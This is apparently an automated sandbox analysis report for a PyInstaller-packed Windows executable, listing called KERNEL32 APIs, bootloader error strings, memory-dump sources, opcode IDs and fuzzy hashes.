                                                                                                                                                                                                                                                                                • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                                                                • API String ID: 199729137-3427451314
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF733398950: MultiByteToWideChar.KERNEL32(?,?,?,00007FF733393A04,00000000,00007FF733391965), ref: 00007FF733398989
                                                                                                                                                                                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF733397CF7,FFFFFFFF,00000000,?,00007FF733393101), ref: 00007FF73339766C
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: ByteCharEnvironmentExpandMultiStringsWide
                                                                                                                                                                                                                                                                                • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                                                                • API String ID: 2001182103-930877121
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                                                                • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                                                                • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                • String ID: -$:$f$p$p
                                                                                                                                                                                                                                                                                • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                • String ID: f$f$p$p$f
                                                                                                                                                                                                                                                                                • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
• Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                                                • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                                                                • Opcode ID: 6029b1735a59e1309af601e5d750f0b91fc035069c103727a7f18ca4da3434e5
                                                                                                                                                                                                                                                                                • Instruction ID: 34360f8626c8bbca8acee6109062f26bdfb926038a54cf2eec90bc2017dc27e5
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6029b1735a59e1309af601e5d750f0b91fc035069c103727a7f18ca4da3434e5
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FB417F22E08652B5FAA0FB1198017B9E3A1BF44BC0FC4C43AED5C677A5DE3CE505A750
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                                                                                                                                                • API String ID: 2050909247-3659356012
                                                                                                                                                                                                                                                                                • Opcode ID: 088a89800c7e6f5b8d7c94df284b479ca42bc713950b7ae474f5026a04d283ec
                                                                                                                                                                                                                                                                                • Instruction ID: ed35644a69ff5f6d4f9502477fd19db1351f604e2c304e4124078d1eb2d6ef82
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 088a89800c7e6f5b8d7c94df284b479ca42bc713950b7ae474f5026a04d283ec
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E416422E08642A5EAA0FF2194016F5F3A1EF44794FC4C43AED5D77BA5DE3CE501A710
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                                • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                                                • Opcode ID: 7d7d5a635fcd63c536a58b816f4712f1a96a9e43b0d550c3d6dd02e630e8922c
                                                                                                                                                                                                                                                                                • Instruction ID: 699ed18adf67ac9a3a34731bb0d083028ac581a014cc6d817312c2ceac22c69e
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7d7d5a635fcd63c536a58b816f4712f1a96a9e43b0d550c3d6dd02e630e8922c
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F2D19F32A09741D6EBB0AB65D4817ADB7A0FB44788F808139EE8D677A5CF3CE491D710
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF733392AC6,?,00007FF733392BC5), ref: 00007FF733392360
                                                                                                                                                                                                                                                                                • FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF733392AC6,?,00007FF733392BC5), ref: 00007FF73339241A
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: CurrentFormatMessageProcess
                                                                                                                                                                                                                                                                                • String ID: %ls$%ls: $<FormatMessageW failed.>$[PYI-%d:ERROR]
                                                                                                                                                                                                                                                                                • API String ID: 27993502-4247535189
                                                                                                                                                                                                                                                                                • Opcode ID: 92e20a795bf73765402ca9ec7783ee5ad9f8f927f89bd5dd19570627e0bc01fb
                                                                                                                                                                                                                                                                                • Instruction ID: 82eefc8548f68028996d500dc375bad434a1f2f839a674204030c7d649ae4d28
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 92e20a795bf73765402ca9ec7783ee5ad9f8f927f89bd5dd19570627e0bc01fb
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3131C422B08A41A1E6B0BB25B8107FAF255BF84B94F808139EF4DB3A59DE3CD506D710
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF73339D50A,?,?,?,00007FF73339D1FC,?,?,?,00007FF73339CDF9), ref: 00007FF73339D2DD
                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF73339D50A,?,?,?,00007FF73339D1FC,?,?,?,00007FF73339CDF9), ref: 00007FF73339D2EB
                                                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF73339D50A,?,?,?,00007FF73339D1FC,?,?,?,00007FF73339CDF9), ref: 00007FF73339D315
                                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF73339D50A,?,?,?,00007FF73339D1FC,?,?,?,00007FF73339CDF9), ref: 00007FF73339D383
                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF73339D50A,?,?,?,00007FF73339D1FC,?,?,?,00007FF73339CDF9), ref: 00007FF73339D38F
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                                                                                                                                • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                • String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
                                                                                                                                                                                                                                                                                • API String ID: 2050909247-2434346643
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 2506987500-0
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                                                • String ID: CONOUT$
                                                                                                                                                                                                                                                                                • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(FFFFFFFF,?,?,00000000,00007FF733398706), ref: 00007FF7333979E2
                                                                                                                                                                                                                                                                                • K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF733398706), ref: 00007FF733397A39
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF733398950: MultiByteToWideChar.KERNEL32(?,?,?,00007FF733393A04,00000000,00007FF733391965), ref: 00007FF733398989
                                                                                                                                                                                                                                                                                • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF733398706), ref: 00007FF733397AC8
                                                                                                                                                                                                                                                                                • K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF733398706), ref: 00007FF733397B34
                                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,00000000,00007FF733398706), ref: 00007FF733397B45
                                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,00000000,00007FF733398706), ref: 00007FF733397B5A
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 3462794448-0
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF7333A5E51,?,?,?,?,00007FF7333AB392,?,?,?,?,00007FF7333A80CB), ref: 00007FF7333AC1D7
                                                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF7333A5E51,?,?,?,?,00007FF7333AB392,?,?,?,?,00007FF7333A80CB), ref: 00007FF7333AC20D
                                                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF7333A5E51,?,?,?,?,00007FF7333AB392,?,?,?,?,00007FF7333A80CB), ref: 00007FF7333AC23A
                                                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF7333A5E51,?,?,?,?,00007FF7333AB392,?,?,?,?,00007FF7333A80CB), ref: 00007FF7333AC24B
                                                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF7333A5E51,?,?,?,?,00007FF7333AB392,?,?,?,?,00007FF7333A80CB), ref: 00007FF7333AC25C
                                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(?,?,?,00007FF7333A5E51,?,?,?,?,00007FF7333AB392,?,?,?,?,00007FF7333A80CB), ref: 00007FF7333AC277
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 2506987500-0
                                                                                                                                                                                                                                                                                • Opcode ID: 297eb830bf51183a03152683679a33ac8e7e939d0b2a29d40b44e033b6affbc9
                                                                                                                                                                                                                                                                                • Instruction ID: 231b752efe3a91f5ec64f96dcd75c20400312888857f6837d8005af300313213
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 297eb830bf51183a03152683679a33ac8e7e939d0b2a29d40b44e033b6affbc9
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0C115124A0C24262FDF477A956511B9E2525F447B0F94C73CD83E7B6E6DE3CE841A320
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                                • Opcode ID: f90418b582b416691a14bbb2ae6c6b71f2096e7654ee2338269033ad2dc175a6
                                                                                                                                                                                                                                                                                • Instruction ID: 2d2532fbde9b007dcdbd394cd0e3222ca29765ec9f614c5e7cfec70f5362ccfa
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f90418b582b416691a14bbb2ae6c6b71f2096e7654ee2338269033ad2dc175a6
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D2F06261B19642A1EAB4AF24E444339E360AF49761FD4863DC66E662E4DF3CD089D720
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: _set_statfp
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 1156100317-0
                                                                                                                                                                                                                                                                                • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                                                                • Instruction ID: 8e20d20c79f2cc50276d4c96c92932557615c5aeecc73470be189f9cdb9ecff2
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A1151B2E5CE0321F6F43128D5A6375B8506F583B4FC4C63DE96E662D6CE7CA8416220
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • FlsGetValue.KERNEL32(?,?,?,00007FF7333AB4E7,?,?,00000000,00007FF7333AB782,?,?,?,?,?,00007FF7333AB70E), ref: 00007FF7333AC2AF
                                                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF7333AB4E7,?,?,00000000,00007FF7333AB782,?,?,?,?,?,00007FF7333AB70E), ref: 00007FF7333AC2CE
                                                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF7333AB4E7,?,?,00000000,00007FF7333AB782,?,?,?,?,?,00007FF7333AB70E), ref: 00007FF7333AC2F6
                                                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF7333AB4E7,?,?,00000000,00007FF7333AB782,?,?,?,?,?,00007FF7333AB70E), ref: 00007FF7333AC307
                                                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF7333AB4E7,?,?,00000000,00007FF7333AB782,?,?,?,?,?,00007FF7333AB70E), ref: 00007FF7333AC318
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                                                                                                                                • Opcode ID: 336e871d9fe7b9feb1d4e8714057d4483739f4a760c37d9f3dc9b8317e64e27b
                                                                                                                                                                                                                                                                                • Instruction ID: ce09ed123c4a6380b85a855b91304270dbab00cca825417155db4c0668b76760
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 336e871d9fe7b9feb1d4e8714057d4483739f4a760c37d9f3dc9b8317e64e27b
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46110D61E0C64262FAF8776995911B9A2415F447A0FD8C33CE87D7B7D6DE3CA841A320
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                                                                                                                                • Opcode ID: 4d8455bc275ec880ad9f8951d6e4f70d9feb0184cd7bbcf1a18e1e455a1bd2fd
                                                                                                                                                                                                                                                                                • Instruction ID: bf7e8adca2edd3ec4cfee50298b5ed4497e1e780ef3f3888d4064201d399d45c
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4d8455bc275ec880ad9f8951d6e4f70d9feb0184cd7bbcf1a18e1e455a1bd2fd
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6811D314B0C20762F9F8B26959521B9A2824F44760FD8C73CE93E7A2D2DE3CB841A370
APIs
Memory Dump Source
• Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
• Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
Similarity
• API ID: Window$Process$ConsoleCurrentShowSleepThread
• String ID:
• API String ID: 3908687701-0
• Opcode ID: c4ce1bea477394a5bd7c29aaffed6a601c2f4b1d57d0592e327ceaa9095476a5
• Instruction ID: bd85457cc4605e66d0a3eade4d037d46282adae7887d1769856f177eaefe5fd0
• Opcode Fuzzy Hash: c4ce1bea477394a5bd7c29aaffed6a601c2f4b1d57d0592e327ceaa9095476a5
• Instruction Fuzzy Hash: 3A016220E1974292EAF46F25A484139A2A4EF84B81F849038D94F57664DE3CD445E720
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
• Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: verbose
• API String ID: 3215553584-579935070
• Opcode ID: 5742ae6ca51b03e9d6fd204cb41504e479b7e72b202bc53543779a715851f7d3
• Instruction ID: 0b2f4029e3b011256ac21752685226ad64fe97c620de2e11a7c06c8d74c89d19
• Opcode Fuzzy Hash: 5742ae6ca51b03e9d6fd204cb41504e479b7e72b202bc53543779a715851f7d3
• Instruction Fuzzy Hash: E891F432A0864661F7B5AEA4D49077DB3E5AB00B54FC4C13AEA6D633C5DF3CE401A320
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
• Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: UTF-16LEUNICODE$UTF-8$ccs
• API String ID: 3215553584-1196891531
• Opcode ID: 59f559b3b4a43374a67f10f227721a3fbc4a07d852e694dccd2ae9d3b54f0314
• Instruction ID: 403d2a3dd3be79751b935ad722e400baf1e790ec4aa68871bd91fe5372830479
• Opcode Fuzzy Hash: 59f559b3b4a43374a67f10f227721a3fbc4a07d852e694dccd2ae9d3b54f0314
• Instruction Fuzzy Hash: 0C81A032E0C242A5F7F46E2A81142B8B7A0AB11B84FD5C13DDA0E77295CB3DE941B761
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
• Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
Similarity
• API ID: CurrentImageNonwritableUnwind__except_validate_context_record
• String ID: csm
• API String ID: 2395640692-1018135373
• Opcode ID: ab412f78eb90613ff4c98a1fac2d50a5770803065215d444c3ce453a3de23157
• Instruction ID: 9b3a9d25391b6d1a4e1a5f057f55985ffa06629813584f82bc6a5517312b0ce1
• Opcode Fuzzy Hash: ab412f78eb90613ff4c98a1fac2d50a5770803065215d444c3ce453a3de23157
• Instruction Fuzzy Hash: 8951B132A19602EADBA4EF15D044B78BB91FB45B98F90C139DA4E57788DF3CE841D710
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
